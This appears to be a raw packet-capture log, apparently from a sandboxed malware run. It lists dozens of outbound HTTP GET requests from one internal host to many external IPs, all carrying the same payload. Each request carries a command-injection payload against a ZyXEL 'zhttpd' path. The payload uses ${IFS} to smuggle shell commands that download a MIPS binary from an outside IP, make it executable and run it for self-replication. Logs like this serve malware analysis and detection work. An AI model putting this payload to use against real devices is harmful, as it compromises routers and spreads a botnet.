                                                Jan 12, 2024 18:24:44.057437897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6427192.168.2.1339294126.202.82.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057468891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6428192.168.2.1357006203.4.126.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057495117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6429192.168.2.133833087.14.199.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057524920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6430192.168.2.1337298209.194.170.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057590961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6431192.168.2.133380461.138.165.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057616949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6432192.168.2.1342118220.93.142.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057651043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6433192.168.2.133472099.108.113.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057693958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6434192.168.2.1348910178.228.59.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057734966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6435192.168.2.133383069.19.238.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057765007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6436192.168.2.1333764155.40.167.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057818890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6437192.168.2.133301488.250.95.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057856083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6438192.168.2.1351880200.101.187.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057914019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6439192.168.2.135096279.179.10.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057934046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6440192.168.2.1344924212.103.131.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057991028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6441192.168.2.134754076.53.50.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058026075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6442192.168.2.133675481.236.52.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058067083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6443192.168.2.135136285.14.253.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058108091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6444192.168.2.1360246179.249.62.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058151007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6445192.168.2.135247488.105.140.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058193922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6446192.168.2.134154059.33.235.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058226109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6447192.168.2.1340072179.31.222.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058290958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6448192.168.2.133835625.112.100.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058315039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6449192.168.2.1339032221.19.187.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058345079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6450192.168.2.135517424.161.92.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058381081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6451192.168.2.1344598112.88.124.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058437109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6452192.168.2.135242632.181.145.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058505058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6453192.168.2.134556435.144.248.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058523893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6454192.168.2.1346526188.218.181.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058537960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6455192.168.2.134223481.201.238.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058600903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6456192.168.2.133359049.177.194.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058623075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6457192.168.2.1333256177.0.253.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058671951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6458192.168.2.13471802.188.52.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058721066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6459192.168.2.1348520200.119.61.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058768988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6460192.168.2.133787423.11.164.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058782101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6461192.168.2.1355110152.29.213.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058842897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6462192.168.2.1336056181.185.34.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058865070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6463192.168.2.134993476.154.182.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058914900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6464192.168.2.1337596222.199.88.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058959007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6465192.168.2.1335028172.158.157.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.058984041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6466192.168.2.133681266.141.168.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.059012890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6467192.168.2.1351018158.213.243.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.059058905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6468192.168.2.1355820223.186.241.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.059086084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6469192.168.2.135699820.48.210.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.059151888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6470192.168.2.134146892.38.255.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.059171915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6471192.168.2.135090661.99.22.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.059212923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6472192.168.2.1336974119.209.73.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.059252024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6473192.168.2.135411041.61.147.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.059298992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6474192.168.2.136092485.0.173.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.059341908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6475192.168.2.135789860.249.76.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.059369087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6476192.168.2.13437308.13.190.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.059417009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6477192.168.2.1336548200.148.85.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.059480906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6478192.168.2.1343896219.247.97.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.059500933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6479192.168.2.134384843.155.101.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.059535980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6480192.168.2.1342132200.29.115.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.059571981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6481192.168.2.135779662.78.92.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.059626102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6482192.168.2.1348568154.41.171.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.059660912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6483192.168.2.1343750158.94.13.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.059693098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6484192.168.2.1359744170.230.159.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.059741020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6485192.168.2.134236682.152.170.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.059781075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6486192.168.2.1334730178.27.216.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.059803963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6487192.168.2.135353672.215.245.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.059858084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6488192.168.2.134957496.82.147.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.059885025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6489192.168.2.1346644166.198.127.64443
                                                TimestampBytes transferredDirectionData
